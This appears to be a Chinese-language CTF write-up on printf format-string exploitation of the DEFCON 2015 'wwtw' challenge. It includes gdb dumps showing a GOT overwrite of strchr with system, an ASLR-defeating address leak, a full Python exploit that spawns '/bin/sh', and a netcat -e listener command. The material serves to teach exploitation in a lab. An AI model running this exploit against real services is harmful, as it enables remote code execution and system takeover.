0x00 前言
本文是二进制漏洞相关的系列文章。printf有一些鲜为人知的特性,在为编码提供便利的同时,也引入了安全的问题。本文重点描述printf在漏洞利用中的一些用法,在正常的编程中不建议这么用。
0x01 概述
printf系列函数的%$(如:%20$x)格式输出,可泄漏栈内的数据(如模块加载的基址),给攻方提供下一步所必须的信息; prinrf系列函数的%n、%hn格式输出,可修改栈中指针指向的任意可写地址(如函数向量表中函数的地址,Windows下叫IAT)。
0x02 基础知识
通常printf的%根据在格式串中出现的顺序,依次使用栈中的地址,但是使用$可以指定特定序号的栈参数。例如: printf(%20$x, 0x100)实际输出的是第20个参数的值。尽管调用者没有提供20个参数,但是c调用格式的压栈方式,能使该代码顺利执行。
第20个参数就是call之前的[esp+420],如果在某次call时,[esp+420]固定的保存着某个关键值,该值就会泄漏给攻击者。
如果该值是镜像模块的某一地址,这个泄漏就会使ASLR(Address space layout randomization)形同虚设。
printf系列函数的%n格式在编程中并不常用。在MS的高版本的运行时库中已经不支持了,代替的是_printf_p函数,参见:https://msdn.microsoft.com/zh-cn/library/Vstudio/bt7tawza(v=vs.110).aspx
以下是printf特殊用法的一些例子:
printf("%2$c,%1$c/n", 'B', 'A'); //$表示使用第几个参数,输出A,B printf("%88c%n/n", 'A', buff); //打印88个字符,前面用空格填充, //最后一个是'A',同时*(int *)buff=88。 printf("%1024c%23$hn/n"); //带有攻击性的做法,第01个参数对用%c, //具体是什么不关心,目标是是把第23个参数 //指向的内存的前2个字节赋值为1024。 printf("%*c%hn/n", 0x1234, 'A', buff); //打印0x1234个字符,前面用空格填充, //最后一个是'A',同时*(short *)buff = 0x1234。
上面这行代码具体说明一下:
- %*c 打印0x1234个字符,前面用空格填充,最后一个是'A'
- %hn 把前面打印的字符数(0x1024)输出到buff指向的2个字节
- %ln 把前面打印的字符数(0x1024)输出到buff指向的4个字节
- %n 把前面打印的字符数(0x1024)输出到buff指向的4个字节
此外顺便看一下#的用法:
printf("%#d/n", 0x10); //#表示输出前导符,如:16 printf("%#x/n", 0x10); //#表示输出前导符,如:0x10 printf("%#o/n", 0x10); //#表示输出前导符,如:020
0x03 实例片段
下面是内存的栈内存的变化情况来展示攻击的过程。
在调用printf时,执行call指令之前:
(gdb) uu $eip => 0x2a9188: call 0x2a8880 <printf@plt> 0x2a918d: lea eax,[ebx-0x1fb4] 0x2a9193: mov DWORD PTR [esp],eax
此时的堆栈如下:
(gdb) dd $esp 0xBFFF4FE0 : BFFF501C 58601366 4049BEFE EF0F16F4 0xBFFF4FF0 : BFC8B039 004E6927 BFFF522C BFFF5024 0xBFFF5000 : BFFF5233 BFFF5026 58601366 4049BEFE 0xBFFF5010 : EF0F16F4 BFC8B039 00000001 342E3135 0xBFFF5020 : 33313239 2D202C37 39312E30 38373832 0xBFFF5030 : 31253A20 25633632 68243732 3432256E 0xBFFF5040 : 63363539 24383225 41416E68 002AD05E 0xBFFF5050 : 002AD05C 00280000 00470048 00000006
其中第一个参数BFFF501C,就是攻击字符串,从以下代码可以看到,目标地址是第27、28参数的两个地址:
(gdb) db BFFF501C 0xBFFF501C : 35 31 2E 34 39 32 31 33 - 37 2C 20 2D 30 2E 31 39 51.492137, -0.19 0xBFFF502C : 32 38 37 38 20 3A 25 31 - 32 36 63 25 32 37 24 68 2878 :%126c%27$h 0xBFFF503C : 6E 25 32 34 39 35 36 63 - 25 32 38 24 68 6E 41 41 n%24956c%28$hnAA 0xBFFF504C : 5E D0 2A 00 5C D0 2A 00 - 00 00 28 00 48 00 47 00 ^.*./.*...(.H.G.
第27个参数是002AD05E,第28个参数是002AD05C,实际上是修改002AD05C处的4个字节。 目标地址002AD05C在调用printf之前的值是009843E0:
(gdb) dd 0x002AD05C 0x002AD05C : 009843E0 002A89B6 00921C00 002A89D6 0x002AD06C : 0099C620 002A89F6 00A07EC0 002A8A16 0x002AD07C : 009EF0D0 009371C0 009EEBD0 002A8A56 0x002AD08C : 00000000 002AD090 00000000 00000000
地址009843E0就是函数strchr,可以查看一下:
(gdb) uu 0x09843E0 0x9843e0 <strchr>: push edi 0x9843e1 <strchr+1>: mov eax,DWORD PTR [esp+0x8] 0x9843e5 <strchr+5>: mov edx,DWORD PTR [esp+0xc] 0x9843e9 <strchr+9>: mov dh,dl
接着执行printf的调用:
(gdb) nn 0x002a918d in ?? () => 0x2a918d: lea eax,[ebx-0x1fb4]
调用printf之后,查看目标地址002AD05C的值:
(gdb) dd 0x002AD05C 0x002AD05C : 00946210 002A89B6 00921C00 002A89D6 0x002AD06C : 0099C620 002A89F6 00A07EC0 002A8A16 0x002AD07C : 009EF0D0 009371C0 009EEBD0 002A8A56 0x002AD08C : 00000000 002AD090 00000000 00000000
原来的009843E0变成了00946210,也就是system的地址,可以查看一下:
(gdb) uu 0x946210 0x946210 <system>: sub esp,0xc 0x946213 <system+3>: mov DWORD PTR [esp+0x4],esi 0x946217 <system+7>: mov esi,DWORD PTR [esp+0x10]
此时对strchr的调用变成了对system的调用,随后如果攻击者发送"/bin/sh"字符串,本来由strchr处理的事情,现在变成了由system处理,从而达成了执行system("/bin/sh")的目标。
0x04 实例分析
这里采用了DEFCON CTF 2015的一个pwn做为例子(wwtw_c3722e23150e1d5abbc1c248d99d718d)。
在wwtw前面的俄罗斯方块的剧情可nop掉,以便程序直接到我们关注的函数sub_1027()。此外,定时器也会影响调试,给nop掉以方便调试。 要攻击的目标函数流程如下:
#!c++ int sub_1027() { double v0; // [email protected] int result; // [email protected] int v2; // [email protected] char *nptr; // [sp+24h] [bp-424h]@4 double v4; // [sp+30h] [bp-418h]@6 char s; // [sp+3Ch] [bp-40Ch]@2 int v6; // [sp+43Ch] [bp-Ch]@1 v6 = *MK_FP(__GS__, 20); while ( 1 ) { while ( 1 ) { printf("Coordinates: "); fflush(stdout); if ( sub_F7E(0, (int)&s, 0x3FF, 10) == -1 ) exit(-1); nptr = strchr(&s, 0x2C); if ( nptr ) break; puts("Invalid coordinates"); } v0 = atof(&s); v4 = atof(nptr + 1); printf("%f, %f/n", v0, v4); if ( 51.492137 != v0 || -0.192878 != v4 ) break; printf("Coordinate "); printf(&s); printf(" is occupied by another TARDIS. Materializing there "); puts("would rip a hole in time and space. Choose again."); fflush(stdout); } printf("You safely travel to coordinates %s/n", &s); result = fflush(stdout); if ( *MK_FP(__GS__, 20) != v6 ) sub_2EF0(v2, *MK_FP(__GS__, 20) ^ v6); return result; }
其中sub_F7E()函数读取用户的输入,放在0x3FF长的一段内存中,从汇编码看这是一个栈上的内存,这是一个关键,如果放在堆中就很难完成攻击。
用户输入的数据在函数内经过一番处理后,printf(&s)又把用户的输入原样输出了。因此我们可以构造下面的字符串,来获取libc和程序本身的加载地址。
"51.492137, -0.192878 :%282$p:%275$p:/n"
相应得到的返回结果:
Coordinate 51.492137, -0.192878 :0x917744:0x2a9491: is occupied by another TARDIS. Materializing there would rip a hole in time and space. Choose again.
其中0x917744是libc代码段的一个固定地址,0x2a9491是程序自己代码段的一个固定地址,由于是固定的地址,因此可通过偏移修正得到加载基址:
libc_base = 0x917744 - 0xc744 = 0x90b000 mod_base = 0x2a9491 - 0x1491 = 0x2a8000
接着进行下一步的攻击,终极目标是执行system("/bin/sh")。 这里选择替换strchr()的IAT,当然atof()也是一个不错的选择。从IDA可以知道strchr()的IAT偏移为0x505c, system()在libc中的实际偏移地址为0x3b210。结合上面得到的mod_base和libc_base可以算出攻击时system()的地址和strchr()的IAT的真实地址,而不受ASLR的限制。
system_funaddr = 0x90b000 + 0x3b210= 0x946210 strchr_iataddr = 0x2a8000 + 0x505c = 0x2ad05c
攻击目标进一步明确为: 替换mod_base+0x505c处的值为libc_base+0x3b210; 发送"/bin/sh",触发system("/bin/sh")。
用libformatstr可方便的生成exp,参见:https://github.com/hellman/libformatstr
preload = "51.492137, -0.192878 :" prelen = len(preload) ###22### offset = ((system_funaddr >> 16 - prelen) << 16) + ((system_funaddr - prelen) & 0xffff) fsb = libformatstr.FormatStr() fsb[strchr_iataddr] = offset & 0xffffffff ###0x7e61fa### index = (60 + prelen + 3) / 4 payload = fsb.payload(index, prelen) exp = preload + payload + "/n"
生成的攻击串exp为:
51.492137, -0.192878 :%126c%27$hn%24956c%28$hnAA/x5e/xd0/x2a/x00/x5c/xd0/x2a/x00
其中包含/x00,这是不完美的,但不影响功能。
关于exp的几点说明:
- 由于%hn只能修改一个WORD,因此修改一个DWORD需要2个%hn。
- exp中"51.492137, -0.192878 :%126c"为22+126(0x94),对应x5e/xd0/x2a/x00的2字节。
- exp中"51.492137, -0.192878 :%126c%24956c"为22+126+24956(0x6210),对应x5c/xd0/x2a/x00的2字节。
- 攻击串必须被放在栈中,否则构造的/x5e/xd0/x2a/x00/x5c/xd0/x2a/x00无法被%27$hn访问到。
- 从预分析中得知call printf时ESP到exp头的距离是60字节(0xBFFF501C-0xBFFF4FE0),由index = (60 + prelen + 3)/4,向上取整即第21个参数,生成时加了6个是payload本身的长度,从而确保[esp+27*4]处正好是/x5e/xd0/x2a/x00。
- libformatstr会根据prelen的长度,以及payload本身的长度计算/x5e/xd0/x2a/x00/x5c/xd0/x2a/x00前需要补充的padding,因此fsb.payload的第二个参数设置为prelen。但在计算%c的时候有没有考虑prelen的长度,需要自己求得修正后的offset。
0x05 exp代码
# -*- coding: utf-8 -*- import sys import socket import time import telnetlib import libformatstr def read_data(expsock, endstr): data = '' while not data.endswith(endstr): data += expsock.read(1) return data offset_system = 0x3b210 offset_strchr_iat = 0x505c sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('127.0.0.1', 2606)) expsock = sock.makefile('rw', bufsize=0) print read_data(expsock, "Selection: ") expsock.write("3/n") print read_data(expsock, "Coordinates: ") expsock.write("51.492137, -0.192878 :%282$p:%275$p:/n") respond = read_data(expsock, "Coordinates: ") libc_base = int(respond.split(':')[1],16) - 0xc744 mod_base = int(respond.split(':')[2],16) - 0x1491 system_funaddr = libc_base + offset_system strchr_iataddr = mod_base + offset_strchr_iat print "mod_base", hex(mod_base) print "libc_base", hex(libc_base) print "system_funaddr", hex(system_funaddr) print "strchr_iataddr", hex(strchr_iataddr) preload = "51.492137, -0.192878 :" prelen = len(preload) ###22### offset = (((system_funaddr >> 16) - prelen) << 16) + ((system_funaddr - prelen) & 0xffff) fsb = libformatstr.FormatStr() fsb[strchr_iataddr] = offset & 0xffffffff ###0x7e61fa### index = (60 + prelen + 3) / 4 payload = fsb.payload(index, prelen) exp = preload + payload + "/n" print "rxp:", exp print "rxp:", exp.encode('hex') time.sleep(50) #for debug expsock.write(exp) read_data(expsock, "Coordinates: ") expsock.write("/bin/sh;/x00/n") sh = telnetlib.Telnet() sh.sock = sock sh.interact()
0x06 构建环境
本文的GDB调试环境使用了.gdbinit和pygdb.py,扩展了raw gdb的功能。 原ELF文件前面有许多坑,为了方便测试,这里绕过了这些坑,修改如下:
00000E82: 85 40 00000E83: C0 40 00001254: E8 90 00001255: B4 90 00001256: 1A 90 00001257: 00 90 00001258: 00 90 00001259: E8 90 0000125A: 5A 90 0000125B: FC 90 0000125C: FF 90 0000125D: FF 90 0000125E: 85 33 00001335: E8 90 00001336: 91 90 00001337: F8 90 00001338: FF 90 00001339: FF 90 0000133A: 8D 90 0000133B: 83 90 0000133C: CB 90 0000133D: BB 90 0000133E: FF 90 0000133F: FF 90 00001340: 89 90 00001341: 44 90 00001342: 24 90 00001343: 04 90 00001344: C7 90 00001345: 04 90 00001346: 24 90 00001347: 0E 90 00001348: 00 90 00001349: 00 90 0000134A: 00 90 0000134B: E8 90 0000134D: F5 90 0000134E: FF 90 0000134F: FF 90 00001350: C7 90 00001351: 04 90 00001352: 24 90 00001353: 02 90 00001354: 00 90 00001355: 00 90 00001356: 00 90 00001357: E8 90 00001358: 94 90 00001359: F5 90 0000135A: FF 90 0000135B: FF 90 00001468: 85 40 00001469: C0 40
服务端启动监听。通常了nc不支持-e参数,需用netcat。
./netcat -l -p 2606 -e ./wwtw_4 ./wwtw_4.py
id 查看结果:
uid=0(root) gid=0(root) group=0(root) env=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论